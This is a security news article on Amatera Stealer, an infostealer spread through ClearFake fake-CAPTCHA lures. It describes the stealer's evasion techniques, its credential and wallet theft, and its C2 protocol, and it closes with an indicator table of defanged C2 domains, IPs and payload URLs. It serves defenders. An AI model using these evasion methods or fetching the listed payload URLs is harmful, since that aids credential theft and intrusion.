Security analysts have identified a surge in attacks leveraging the newly rebranded Amatera Stealer, a sophisticated information stealer malware-as-a-service (MaaS) descended from the ACR Stealer family.
The latest campaigns, detected by Proofpoint researchers, deploy Amatera Stealer through advanced web injection techniques primarily via the ClearFake cluster showcasing significant technical enhancements, anti-analysis capabilities, and updates in command and control (C2) protocols.
Amatera Stealer represents an evolution of the ACR Stealer with marked code overlap, but it has undergone enough development to be classified as a distinct threat.
The malware is actively sold on underground panels with subscription models ranging from $199 per month to $1,499 per year, highlighting the commoditization of sophisticated cybercrime tools.
With the disruption of leading alternatives like Lumma Stealer, security experts anticipate Amatera will gain further traction among cybercriminal operators.
Distribution primarily occurs via web injects, specifically ClearFake campaigns observed in April and May 2025.
In these attacks, legitimate but compromised websites serve malicious JavaScript loaded from blockchain-hosted contracts a method known as “EtherHiding.”
Victims are typically presented with a fake CAPTCHA overlay, prompting them to interact with a Windows Run dialog via the ClickFix technique, ultimately executing malicious PowerShell commands that lead to multi-stage payload delivery.
Anti-Analysis Features
Amatera Stealer has adopted several advanced techniques to evade both automated and manual analysis.
Most notably, it leverages direct NTSockets for C2 communication by interfacing with \\Device\\Afd\\Endpoint, thereby circumventing traditional Windows networking APIs typically monitored by endpoint detection and response (EDR) solutions.
The malware prefers connecting to C2 addresses via direct IP often public CDN (Cloudflare) endpoints with hardcoded host headers, avoiding DNS lookups and complicating IP-based blacklisting.
Recent builds also introduce dynamic API resolution and execution using WoW64 syscalls.
According to Proofpoint Report, this allows the malware to resolve and invoke Windows APIs dynamically, bypassing user-mode API hooks instrumental to many sandboxes and EDR products.
Additionally, Amatera Stealer disables PowerShell logging, employs Null-AMSI to defeat the Antimalware Scan Interface, and makes use of Early Bird and Context Hijack injection techniques for payload delivery further strengthening its anti-analysis posture.
Payload Handling and Exfiltration
Upon execution, Amatera Stealer contacts its C2 (now using both HTTP and HTTPS) to fetch a configurable JSON payload dictating its behavior.
The malware primarily targets browser credentials, cookies, web form data, crypto wallets, password managers, and sensitive files associated with email clients and messaging applications.
By injecting shellcode into Chrome-based browsers, it can specifically bypass App Bound Encryption protections and exfiltrate sensitive files.
The C2 protocol utilizes Base64-encoded, XOR-encrypted data with JSON configuration, enabling flexible and modular command execution, including support for secondary payloads such as .exe, .dll, .cmd, and .ps1 files.
ClearFake continues to pioneer social engineering and payload delivery methods. The ClickFix technique manipulates users into interacting with Windows system dialogs, facilitating fileless malware deployment through legitimate tools like PowerShell and msbuild.exe.
Ongoing innovations in obfuscation, encryption, and payload staging further complicate detection and remediation efforts.
Given the ongoing development and deployment of Amatera Stealer, organizations should enhance user awareness, harden security training against social engineering lures, and implement strict controls to block unauthorized PowerShell and script execution.
Monitoring for behavioral indicators, rather than signature-based detection alone, is recommended due to the stealer’s extensive anti-analysis techniques.
Indicators of Compromise (IOCs)
| Type | Value/Identifier | Notes |
|---|---|---|
| SHA256 | 120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2 | Amatera Stealer: NTSockets, no HTTPS, no second stage malware |
| SHA256 | 7d91a585583f4aa1a3ab3cb808d7bc351d6140b3ae1deeef9d51c6414c11baea | Amatera Stealer: NTSockets usage, HTTPS support |
| SHA256 | 35eb93548a0c037d392f870c05e0e9fb1aeff3a5a505e1d4a087f7465ed1f6af | Amatera Stealer: NTSockets usage, HTTPS C2 |
| SHA256 | 2960d5f8a3d9b0a21d6b744092fe3089517ecf2e49169683f754bfe9800e3991 | ClearFake ClickFix csproj payload |
| SHA256 | ad9ffd624e27070092ff18a10e33fa9e2784b2c75ac9ac4540fa81cf5bd84e55 | ClearFake second stage PowerShell |
| SHA256 | 055a883f18ffcc413973fa45383e72e998aae87909af5f9507b6384bfec34a5b | ClearFake shellcode leading to Amatera |
| IP | 104.21.80[.]1 | Amatera C2: overplanteasiest[.]top |
| IP | 172.67.178[.]5 | Amatera C2: badnesspandemic[.]shop |
| Domain | amaprox[.]icu | Amatera infrastructure (HTTPS security context) |
| Domain | b1[.]talismanoverblown[.]com | Amatera infrastructure (C2, HTTPS) |
| URL | https://cv[.]cbrw[.]ru/t.csproj | ClearFake ClickFix payload |
| URL | https://tt[.]cbrw[.]ru/vb7to8.psd | ClearFake second stage PowerShell |
| URL | https://cv[.]cbrw[.]ru/init1.bin | ClearFake shellcode leading to Amatera |
| Other | 0x80d31D935f0EC978253A26D48B5593599B9542C7 | ClearFake smart contract (BNB Smart Chain Testnet) |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
